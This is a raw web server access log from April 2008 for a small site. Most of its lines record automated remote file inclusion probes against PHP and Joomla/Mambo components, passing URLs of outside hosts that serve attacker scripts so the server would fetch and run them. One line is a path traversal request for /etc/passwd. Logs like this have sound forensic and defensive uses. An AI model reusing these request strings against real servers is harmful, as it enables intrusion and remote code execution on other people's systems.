137.204.107.138 - - [30/Apr/2008:12:15:33 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:15:36 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:15:36 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.geocities.com/cmd182182/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:15:36 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.geocities.com/cmd182182/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:15:40 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:15:40 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:15:55 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:12:15:57 -0700] "GET //ashnews.php?pathtoashnews=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:16:01 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:16:01 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:16:02 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:12:16:02 -0700] "GET /logs/access.log/view.php?sub=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:12:16:05 -0700] "GET /view.php?sub=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [30/Apr/2008:12:16:06 -0700] "GET /logs/view.php?sub=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:16:11 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [30/Apr/2008:12:16:15 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [30/Apr/2008:12:16:15 -0700] "GET //components/minibb/index.php?absolute_path=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:16:31 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:16:32 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:16:33 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:16:36 -0700] "GET /logs//components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:16:36 -0700] "GET //components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:16:36 -0700] "GET /logs//components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
213.186.117.208 - - [30/Apr/2008:12:16:36 -0700] "GET //components/com_mamblog/editblog.php?mosConfig_absolute_path=http://computasiunair.com/paddy/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:12:16:43 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:12:16:43 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:16:48 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:16:49 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.133.81 - - [30/Apr/2008:12:17:01 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [30/Apr/2008:12:17:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [30/Apr/2008:12:17:01 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:17:13 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:17:17 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:17:18 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:17:20 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:17:31 -0700] "GET /logs/access_080125.log/enc/content.php?Home_Path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.155.173 - - [30/Apr/2008:12:17:35 -0700] "GET /logs/access_080218.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:17:39 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:17:39 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.39 - - [30/Apr/2008:12:17:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:17:41 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:17:41 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.39 - - [30/Apr/2008:12:17:44 -0700] "GET / HTTP/1.1" 200 11606 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:17:59 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:12:18:01 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:12:18:01 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
89.111.176.28 - - [30/Apr/2008:12:18:09 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [30/Apr/2008:12:18:10 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [30/Apr/2008:12:18:19 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [30/Apr/2008:12:18:19 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.165.98 - - [30/Apr/2008:12:18:22 -0700] "GET / HTTP/1.0" 200 11590 "http://search.live.com/results.aspx?q=byron&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:18:23 -0700] "GET /logs/access_080215.log//?php=inchttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.165.98 - - [30/Apr/2008:12:18:23 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:18:29 -0700] "GET /logs//?php=inchttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 200 45416 "-" "libwww-perl/5.79" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:18:29 -0700] "GET //?php=inchttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
62.94.221.218 - - [30/Apr/2008:12:18:35 -0700] "GET /logs/module_db.php?pivot_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [30/Apr/2008:12:18:36 -0700] "GET /module_db.php?pivot_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.241.172.8 - - [30/Apr/2008:12:18:47 -0700] "GET //components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:18:55 -0700] "GET /logs/access_080225.log//?php=paginahttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [30/Apr/2008:12:19:05 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.181 - - [30/Apr/2008:12:19:16 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:19:17 -0700] "GET /logs/home.php?inc=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:19:17 -0700] "GET /home.php?inc=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:19:22 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:12:19:24 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:19:24 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:19:25 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:19:26 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:19:26 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:12:19:28 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [30/Apr/2008:12:19:29 -0700] "GET //components/com_mamblog/showblogs.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:19:33 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:12:19:33 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:19:33 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:12:19:33 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:19:36 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:19:39 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:12:19:40 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:12:19:44 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.50.214.191 - - [30/Apr/2008:12:19:45 -0700] "GET /logs//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.50.214.191 - - [30/Apr/2008:12:19:45 -0700] "GET //includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://buycheaperwebhosting.com/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:12:19:45 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.lineupevents.nl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:12:19:45 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.lineupevents.nl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.6.175 - - [30/Apr/2008:12:19:58 -0700] "GET /logs/access_080313.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.3.49.2 - - [30/Apr/2008:12:20:02 -0700] "GET /logs/index.php?x=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
189.3.49.2 - - [30/Apr/2008:12:20:07 -0700] "GET /index.php?x=/../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:20:25 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:20:27 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:12:20:27 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.geocities.com/cmd182182/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:21:15 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:21:15 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:21:16 -0700] "GET /logs/access_080218.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:12:21:18 -0700] "GET /logs/index.php?option=com_rss&=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.58.179.218 - - [30/Apr/2008:12:21:22 -0700] "GET /index.php?option=com_rss&=&mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/upload/index.php/boo.do??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:21:32 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:21:32 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:22:30 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:22:33 -0700] "GET //index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.70.163 - - [30/Apr/2008:12:22:33 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:22:35 -0700] "GET /logs/access_080225.log//?php=paginahttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:12:22:39 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Apr/2008:12:22:45 -0700] "GET /logs/access_080108.log/component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://mountainpathhomes.com/CMS/templates/disco2tdoy/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Apr/2008:12:22:45 -0700] "GET /component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://mountainpathhomes.com/CMS/templates/disco2tdoy/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Apr/2008:12:22:45 -0700] "GET /logs/component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://mountainpathhomes.com/CMS/templates/disco2tdoy/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:22:55 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:12:22:55 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.133.81 - - [30/Apr/2008:12:23:00 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.81 - - [30/Apr/2008:12:23:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.macauktion.dk/js/safeku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Apr/2008:12:23:06 -0700] "GET /logs/access_080108.log/administrator/components/com_events/includes/comutils.php?&mosConfig_absolute_path=http://mountainpathhomes.com/CMS/templates/disco2tdoy/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Apr/2008:12:23:06 -0700] "GET /administrator/components/com_events/includes/comutils.php?&mosConfig_absolute_path=http://mountainpathhomes.com/CMS/templates/disco2tdoy/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Apr/2008:12:23:07 -0700] "GET /logs/administrator/components/com_events/includes/comutils.php?&mosConfig_absolute_path=http://mountainpathhomes.com/CMS/templates/disco2tdoy/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:23:13 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:23:16 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
